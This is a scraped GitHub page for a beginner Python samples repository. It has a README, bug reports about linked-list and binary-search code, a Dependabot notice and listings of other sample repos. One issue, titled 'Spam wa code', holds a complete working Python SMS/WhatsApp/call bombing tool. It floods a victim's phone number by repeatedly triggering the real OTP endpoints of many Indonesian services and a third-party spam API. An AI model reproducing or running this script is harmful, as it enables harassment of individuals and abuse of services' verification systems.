Repository to store sample python programs for python learning

Overview

py

Repository to store sample Python programs.

This repository is meant for beginners to assist them in their learning of Python. The repository covers a wide range of algorithms and other programs, and would prove immensely helpful for everybody interested in Python programming.

If this is your first time coding in Python, I would love to suggest you begin from the Basics. They are simple to understand and hopefully will prove fun to you.

You can also pay a visit to my very own Youtube channel.

Contributions to the repository are welcome.

CodeBasics.

Happy coding!

Comments
  • 13_imbalanced_homework_youtube

    13_imbalanced_homework_youtube

    Hope this works, this is my very first pull-request and I´m not sure if converting the Kaggle Notebook to local works out. just in case, here´s the Kaggle link https://www.kaggle.com/seitanist/codebasics-exercise/

    keep up the great work! cheers tchintchie from Youtube

    opened by tchintchie 2
  • insertAtBegin method is not working in double linked list in your solution.

    insertAtBegin method is not working in double linked list in your solution.

    Hello,

    Thanks for the lesson on linked list. I understood it completely.

    This should work. Please update.

    def insertAtBegin(self, data): if self.head is None: node = Node(data, self.head, None) self.head = node return node = Node(data, self.head, None) node.next = self.head self.head.prev = node self.head = node

    opened by aswinramakrishnan 2
  • Bengaluru home price hosting issue

    Bengaluru home price hosting issue

    Dear team,

    Please help me out . I've written the exact same code for this project . the nginx server starts fine and shows "Running" , but i couldn't load the app.html file its giving me "403 - forbidden" error.

    I've tried many time but didn't worked out .

    any suggestions is a great help.

    opened by shrikanth88 1
  • Bump opencv-python from 3.4.3.18 to 3.4.7.28 in /DataScience/CelebrityFaceRecognition/model

    Bump opencv-python from 3.4.3.18 to 3.4.7.28 in /DataScience/CelebrityFaceRecognition/model

    Bumps opencv-python from 3.4.3.18 to 3.4.7.28.

    Release notes

    Sourced from opencv-python's releases.

    3.4.7.28

    OpenCV version 3.4.7.

    3.4.6.27

    OpenCV version 3.4.6.

    3.4.5.20

    OpenCV version 3.4.5.

    Once some build issues are solved, next releases will be targeting OpenCV version 4.

    3.4.4.19

    OpenCV version 3.4.4.

    Thanks to Ivan Pozdeev for following fixes and enhancements: #135, #136, #141, #144, #145, #146, #147, #149, #150

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 1
  • Update 3_odd_even_numbers.py

    Update 3_odd_even_numbers.py

    If max is an odd number that will be excluded due to range function hence (max+1) Rather than manual checking of odd we can use steps of range to generate the same

    opened by vikasit12 1
  • insertion at begining

    insertion at begining

    Hi , In doublylinkedlist.py

    when I try to print this statement i'm getting error: if name == 'main': ll = DoublyLinkedList() ll.insert_at_begining("mango")

    plse try to use this insert_at_begining() first and see the case.

    opened by MervinJarvis 1
  • Changed of argument in binary_search_recursive()

    Changed of argument in binary_search_recursive()

    Code presented by you wasn't wrong but at the point in your video where that error occurred it was __ "Index Error: list index out of range". It occurred because value of argument( i.e. right_index) when we called the function was given as length of list. So whenever a number to be search was not present in the list our Algorithm would just search and search and eventually tried to go beyond available indices. Hence just by changing value of that argument ( i.e. right_index) at calling stage of function (i.e. binary_search_recursive() )we can save the extra checkpoint that is been omitted in this above code.

    bug 
    opened by ghost 1
  • insert_at_begining

    insert_at_begining

    if there is not a single elements and we try to implement insert_at_begining its showing elf.head.prev = node AttributeError: 'NoneType' object has no attribute 'prev' so .Hence if condition in added

    opened by pratik213 1
  • Spam wa code

    Spam wa code

    import os,sys,time,requests,json,random from colorama import Fore,Back,init

    B = Fore.BLUE W = Fore.WHITE R = Fore.RED G = Fore.GREEN BL = Fore.BLACK Y = Fore.YELLOW

    #warna ngab Hijau="\033[1;92m" putih="\033[1;97m" abu="\033[1;90m" kuning="\033[1;93m" ungu="\033[1;95m" merah="\33[37;1m" biru="\033[1;96m" #Tulisan Background Merah bg="\033[1;0m\033[1;41mText\033[1;0m"

    try: import os,sys,time,requests,json,random from colorama import Fore,Back,init except ModuleNotFoundError: print(f"{W}[{R}!{W}] Bahan Belum Terinstall{abu}...") time.sleep(5) print(f"{W}[{R}!{W}] Type{R}:{Y}pip{W} install colorama requests")

    def mengetik(z): for e in z + "\n": sys.stdout.write(e) sys.stdout.flush() time.sleep(0.01)

    def mr_wibu(): mr_tytyd = input(f"{B}Kirim spam lagi!!! {putih}({G}y{W}/{Y}n{putih}){R}:{W} ") if mr_tytyd=="y" or mr_tytyd=="Y": time.sleep(5) put() if mr_tytyd=="n" or mr_tytyd=="N": sys.exit(f"{W}[{R}!{W}] Keluar dari script{biru}....{W}") time.sleep(5)

    def logo_taekyung(): try: os.system("clear") print(f"""

    \033[1;0m\033[1;41m\033[1;0m \033[33;1m ______ __ __ ______ \033[36;1m __ \033[31;1m __ __ ______
    \033[33;1m /\ \ /\ "-./ \ /\ \ \033[36;1m \ _ \033[31;1m /\ \ _ \ \ /\ __ \
    \033[33;1m \ _
    \ \ \ -./\ \ \ _
    \ \033[36;1m _
    \ \033[31;1m \ \ / ".\ \ \ \ __ \
    \033[33;1m /_\ \ _\ \ _\ /_\ \033[36;1m _\ \033[31;1m \ _/".~_\ \ _\ _\ \033[33;1m /
    / // // /_____/ \033[36;1m \033[31;1m // // ///_/

                        {putih}[\033[33;1mScript version : \033[36;m2.6.0{putih}]
    

    \033[33;1m╔═══════════════════════════════════╗ \033[33;1m \033[36;1m [*] Youtube : BELTOK OFFICIAL \033[33;1m ║ \033[33;1m╚═══════════════════════════════════╝ \033[36;1m╔═══════════════════════════════════╗ \033[36;1m[*]\033[33;1m GUNAKAN TOOLS INI DENGAN BIJAK\033[36;1m║ \033[36;1m╚═══════════════════════════════════╝ """) except requests.exceptions.ConnectionError: sys.exit(f"{W}[{R}!{W}] Error Cek Jaringan{abu}....{abu}") except KeyboardInterrupt: sys.exit(f"{W}[{R}!{W}] Keluar{abu}...{W}")

    def put(): logo_taekyung() try: mr_ua=random.choice(["Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v7108827108815046027 t6205049005192687891","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v1692361810532096513 t9071033982482470646","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v4466439914708508420 t8068951106021062059","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v8880767681151577953 t8052286838287810618","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 RuxitSynthetic/1.0 v6215776200348075665 t6662866128547677118","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v1588190262877692089 t2919217341348717815","Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 RuxitSynthetic/1.0 v5330150654511677032 t9071033982482470646","Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 11; vivo 2007) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36","Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Safari/537.36"]) mengetik("\033[1;30m<════════════[\033[1;33;41m • \033[1;37m Input telepon \033[1;33m• \033[0m\033[1;30m]══════════════>") mengetik("\033[37m[\033[31m•\033[37m]\033[32m Contoh nomor\033[37m : \033[37m\033[33m8Xxxxxxx\033[33m") mr_am=input(f"\n\033[37m[\033[31m•\033[37m]\033[32m Nomor Target\033[32m \033[37m:\033[37m\033[33m ") mengetik("\033[1;30m<════════════[\033[1;33;41m • \033[1;37m MASUKAN JUMLAH \033[1;33m• \033[0m\033[1;30m]═════════════>") power_python=int(input(f"\033[37m[\033[31m•\033[37m]\033[32m Jumlah Spam\033[37m :\033[37m\033[33m ")) print ("") for i in range(int(power_python)): time.sleep(1) jag2={"Host":"id.jagreward.com","Connection":"keep-alive","Accept":"/","User-Agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","Sec-Fetch-Site":"same-origin","Sec-Fetch-Mode":"cors","Sec-Fetch-Dest":"empty","Referer":"https://id.jagreward.com/member/register/","Accept-Encoding":"gzip, deflate, br","Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"} jag=requests.get("https://id.jagreward.com/member/verify-mobile/"+mr_am+"/",headers=jag2).text if "call" in jag: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Call Ke No {Y}{mr_am}") else: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Call Ke No {Y}{mr_am}") time.sleep(1) url = "https://aink-sanz.herokuapp.com/api/free-tutorial-spam-wa" AM = { "nomor": mr_am } sms = requests.get(url, params=AM) gas = sms.text if "Berhasil Ngab" in gas: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam WA Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam WA Ke No {Y}{mr_am}") time.sleep(1) dekor2=requests.post("https://auth.dekoruma.com/api/v1/register/request-otp-phone-number/?format=json",headers={"Host":"auth.dekoruma.com","save-data":"on","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json","accept":"/","origin":"https://m.dekoruma.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.dekoruma.com/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phoneNumber":"+62"+mr_am,"platform":"sms"})).text if "ok" in dekor2: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(1) buka=requests.post("https://api.bukuwarung.com/api/v1/auth/otp/send",headers={"Accept":"application/json","X-APP-VERSION-NAME":"3.4.0","X-APP-VERSION-CODE":"3399","Content-Type":"application/json; charset=UTF-8","Host":"api.bukuwarung.com","Connection":"Keep-Alive","Accept-Encoding":"gzip","User-Agent":"Mozilla/5.0 (Linux; Android 11; vivo 2007) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36"},json={"action":"LOGIN_OTP","countryCode":"62","deviceId":"00000177-142d-f1a2-bac4-57a9039fdc4d","method":"WA","phone":"0"+mr_am}).text if "neng" in buka: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam WA Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam WAKe No {Y}{mr_am}") time.sleep(1) lummo={"Host":"api.tokko.io","accept-language":"id","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json","accept":"/","origin":"https://web.lummoshop.com","sec-fetch-site":"cross-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://web.lummoshop.com/","accept-encoding":"gzip, deflate, br"} gas=json.dumps({"operationName":"generateOTP","variables":{"generateOtpInput":{"phoneNumber":"+62"+mr_am,"hashCode":"","channel":"SMS","userType":"MERCHANT"}},"query":"mutation generateOTP($generateOtpInput: GenerateOtpInput!) {\n generateOtp(generateOtpInput: $generateOtpInput) {\n phoneNumber\n }\n}\n"}) gaskeun=requests.post("https://api.tokko.io/graphql",headers=lummo,data=gas).text if "erors" in gaskeun: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam SmsKe No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(1) AmmarGamteng=requests.post("https://www.olx.co.id/api/auth/authenticate",data=json.dumps({"grantType": "retry","method": "sms","phone":"62"+mr_am,"language": "id"}), headers={"accept": "/","x-newrelic-id": "VQMGU1ZVDxABU1lbBgMDUlI=","x-panamera-fingerprint": "83b09e49653c37fb4dc38423d82d74d7#1597271158063","user-agent": mr_ua,"content-type": "application/json"}).text if "PENDING" in AmmarGamteng: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}{W}") time.sleep(1) AmmarBN={"Host":"beryllium.mapclub.com","content-type":"application/json","accept-language":"en-US","accept":"application/json, text/plain, /","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","origin":"https://www.mapclub.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.mapclub.com/","accept-encoding":"gzip, deflate, br"} wkwk=json.dumps({"account":mr_am}) req = requests.post("https://beryllium.mapclub.com/api/member/registration/sms/otp",headers=AmmarBN,data=wkwk).text if "salto" in req: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(2) ol={"Host":"api-dash.olsera.co.id","content-length":"337","accept":"application/json, text/plain, /","content-type":"application/json;charset=UTF-8","sec-ch-ua-mobile":"?0","user-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36","sec-ch-ua-platform":"Linux","origin":"https://dashboard.olsera.co.id","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://dashboard.olsera.co.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"} ol2=json.dumps({"name":"AmmarExecuted","email":"[email protected]","password":"@mm4rgans","phone":"+62"+mr_am,"phone_format":mr_am,"name_toko":"","url_id":"","business_type_id":"","service_type_id":3,"country_id":"ID","city_id":"","state_id":"","pos_resto_mode":0,"i_agree":"true","address":"","id":"null","tokenMiscall":"","use_otp_type":3}) o13=requests.post("https://api-dash.olsera.co.id/api/admin/v1/en/register",headers=ol,data=ol2).text if "gas" in o13: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(1) ua={"Host":"auth.sampingan.co","domain-name":"auth-svc","app-auth":"Skip","content-type":"application/json; charset=UTF-8","user-agent":"okhttp/4.9.1","accept":"application/vnd.full+json","accept":"application/json","content-type":"application/vnd.full+json","content-type":"application/json","app-version":"2.1.2","app-platform":"Android"} data=json.dumps({"channel":"WA","country_code":"+62","phone_number":mr_am}) coi=requests.post("https://auth.sampingan.co/v1/otp",data=data,headers=ua).text if "coi" in coi: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam WA Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam WA Ke No {Y}{mr_am}") time.sleep(1) Ammar={"Host":"www.autofun.co.id","content-length":"84","accept":"/","save-data":"on","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json;charset=UTF-8","origin":"https://www.autofun.co.id","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.autofun.co.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"} Ganz=json.dumps({"phoneNum":"620"+mr_am,"languageCode":"id-id","countryCode":"id","platform":2}) Gwganz=requests.post("https://www.autofun.co.id/v2/captcha/sms",headers=Ammar,data=Ganz).text if "cus" in Gwganz: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam SnsKe No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(2) heading = {"Host":"evermos.com","accept":"application/json, text/plain, /","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json;charset=UTF-8","origin":"https://evermos.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://evermos.com/registration/otp","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"} ammarganz=json.dumps({"phone":"62"+mr_am}) req=requests.post("https://evermos.com/api/register/phone-registration",headers=heading,data=ammarganz).text if "woi" in req: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") time.sleep(1) kepala={"Host":"m.redbus.id","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","accept":"/","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.redbus.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7",} gw=requests.get("https://m.redbus.id/api/getOtp?number="+mr_am+"&cc=62&whatsAppOpted=true&disableOtpFlow=undefined",headers=kepala).text if "send" in gw: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam WA Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam WA Ke No {Y}{mr_am}") time.sleep(1) headers = {'Connection' : 'keep-alive','Accept' : 'application/json, text/javascript, /; q=0.01','Origin' : 'https://accounts.tokopedia.com','X-Requested-With' : 'XMLHttpRequest','User-Agent' : '{acak}','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8','Accept-Encoding' : 'gzip, deflate',} site = requests.get('https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn=0'+mr_am+'&ld=https%3A%2F%2Faccounts.tokopedia.com%2Fregister%3Ftype%3Dphone%26phone%3D{}%26status%3DeyJrIjp0cnVlLCJtIjp0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ%253D%253D', headers = headers).text if "sms" in site: mengetik(f"{W}[{R}×{W}] Gagal Mengirim Spam Sms Ke No {Y}{mr_am}") else: mengetik(f"{W}[{G}✓{W}] Mengirim Spam Sms Ke No {Y}{mr_am}") mr_wibu() except requests.exceptions.ConnectionError: sys.exit(f"{W}[{R}!{W}] Error Cek Jaringan lu Ngab{abu}....{abu}") except KeyboardInterrupt: sys.exit(f"{W}[{R}!{W}] Keluar!!{abu}...{W}") except ValueError: sys.exit(f"{W}[{Y}!{W}] Lu jangan asal masukin{abu}.....")

    if name=='main': put()

    opened by Beltokproject 0
  • Update 22_list_set_dict_comprehension.py

    Update 22_list_set_dict_comprehension.py

    I tried to contribute to an open source for the first time, hope this helps. I have provided an if/else comprehension addition and a square and cube addition.

    opened by akhilesh085 0
Owner
codebasics
codebasics
Cloud Native sample microservices showcasing Full Stack Observability using AppDynamics and ThousandEyes

Cloud Native Sample Bookinfo App Observability Bookinfo is a sample application composed of four Microservices written in different languages.

Cisco DevNet 13 Jul 21, 2022
Sample microservices application demo

Development mode docker-compose -f docker-compose.yml -f docker-compose.dev.yml up -d or export COMPOSE_FILE='docker-compose.yml:docker-compose.dev.ym

Konstantinos Bairaktaris 1 Nov 14, 2021
Korg Volca Sample uploader for linux.

GnuVolca Korg Volca Sample uploader for linux. GnuVolca Usage Installation Via virtualenv Usage Store all the samples you want to upload on an empty d

Gonzalo Rafuls 12 Oct 11, 2022
This is a far more in-depth and advanced version of "Write user interface to a file API Sample"

Fusion360-Write-UserInterface This is a far more in-depth and advanced version of "Write user interface to a file API Sample" from https://help.autode

null 4 Mar 18, 2022
This is sample project needed for security course to connect web service to database

secufaku This is sample project needed for security course to "connect web service to database". Why it suits alignment purpose It connects to postgre

Mark Nicholson 6 May 15, 2022
Py4J enables Python programs to dynamically access arbitrary Java objects

Py4J Py4J enables Python programs running in a Python interpreter to dynamically access Java objects in a Java Virtual Machine. Methods are called as

Barthelemy Dagenais 1k Jan 2, 2023
A code base for python programs the goal is to integrate all the useful and essential functions

Base Dev EN This GitHub will be available in French and English FR Ce GitHub sera disponible en français et en anglais Author License Screen EN ???? D

Pikatsuto 1 Mar 7, 2022
Hypothesis strategies for generating Python programs, something like CSmith

hypothesmith Hypothesis strategies for generating Python programs, something like CSmith. This is definitely pre-alpha, but if you want to play with i

Zac Hatfield-Dodds 73 Dec 14, 2022
A series of basic programs written in Python

Primeros programas en Python Una serie de programas básicos escritos en Python

Madirex 1 Feb 15, 2022
Repo created for the purpose of adding any kind of programs and projects

Programs and Project Repository A repository for adding programs and projects of any kind starting from beginners level to expert ones Contributing to

Unicorn Dev Community 3 Nov 2, 2022
A platform for developers 👩‍💻 who wants to share their programs and projects.

Fest-Practice-2021 This project is excluded from Hacktoberfest 2021. Please use this as a testing repo/project. A platform for developers ??‍?? who wa

Mayank Choudhary 40 Nov 7, 2022
Repo created for the purpose of adding any kind of programs and projects

Programs and Project Repository A repository for adding programs and projects of any kind starting from beginners level to expert ones Contributing to

Unicorn Dev Community 3 Nov 2, 2022
Dotfiles & list of programs

dotfiles & list of programs So I wanted to just backup my most used files. I have a bad habit, sometimes I get tired of a distro and do a wipe and sta

null 2 Sep 4, 2022
Some shitty programs just to brush up on my understanding of binary conversions.

Binary Converters Some shitty programs just to brush up on my understanding of binary conversions. Supported conversions formats = "unsigned-binary" |

Tim 2 Jan 9, 2022
ArinjoyTheDev 1 Jul 17, 2022
PREFS is a Python library to store and manage preferences and settings.

PREFS PREFS is a Python library to store and manage preferences and settings. PREFS stores a Python dictionary in a total human-readable file, the PRE

Pat 13 May 26, 2022
K2HASH Python library - NoSQL Key Value Store(KVS) library

k2hash_python Overview k2hash_python is an official python driver for k2hash. Install Firstly you must install the k2hash shared library: curl -o- htt

Yahoo! JAPAN 3 Oct 19, 2022
CaskDB is a disk-based, embedded, persistent, key-value store based on the Riak's bitcask paper, written in Python.

CaskDB - Disk based Log Structured Hash Table Store CaskDB is a disk-based, embedded, persistent, key-value store based on the Riak's bitcask paper, w

null 886 Dec 27, 2022
A basic notes app to store your notes.

Notes Webapp A basic notes webapp to keep your notes.You can add, edit and delete notes after signing up. To add a note type your note in the text box

null 2 Oct 23, 2021